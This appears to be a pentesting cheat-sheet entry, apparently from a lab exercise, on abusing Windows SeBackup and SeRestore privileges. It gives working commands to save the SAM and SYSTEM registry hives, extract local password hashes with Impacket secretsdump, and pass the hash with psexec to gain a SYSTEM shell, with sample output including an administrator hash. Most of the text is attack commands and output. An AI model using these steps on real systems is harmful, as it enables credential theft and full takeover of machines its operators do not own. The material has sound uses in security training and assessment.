SeBackup - SeRestore
Administrators - SeBackupPrivilege - SeRestorePrivilegeSeBackup and SeRestore Privileges allow Users to Read - Write to any File in the System, Ignoring any DACL in place. The idea behind this Privilege is to Allow certain Users to perform BackUP's from a System (Without Requiring full Administrative Privileges).
This can be Achieved by Dumping the SAM and SYSTEM Registry Hives to extract the Local Administrator Password Hash.
SAM - SYSTEM
After verifying that we have the Required Privileges now we can Copy SAM and SYSTEM Hashes. After that we can Copy the Dumped Files to Our Machine where we can Retrieve the User Password Hashes by Using Impacket SecretsDump,
- Dump
- SecretsDump
- Output
reg save HKLM\sam "Dump Output Path/sam-reg"
reg save HKLM\system "Dump Output Path/system-reg"
secretsdump.py -sam sam.hive -system system.hive LOCAL
[*] Target System BootKey: 0x36c8d26ec0df8b23ce63bcefa6e2d821
[*] Dumping Local SAM Hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:13a04cdcf3f7ec41264e568127c5ca94:::
Pass-The-Hash
We can use psexec to perform the Pass-The-Hash Attack and gain Access to the Target Machine.
- PsExec
- Output
psexec.py -hashes <HASH> <Username>@<IP>
[*] Requesting Shares on 10.10.175.90.....
[*] Found Writable Share ADMIN$
[*] Uploading File nfhtabqO.exe
[*] Opening SVCManager on 10.10.175.90.....
[*] Creating Service RoLE on 10.10.175.90.....
[*] Starting Service RoLE.....
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
NT AUTHORITY\SYSTEM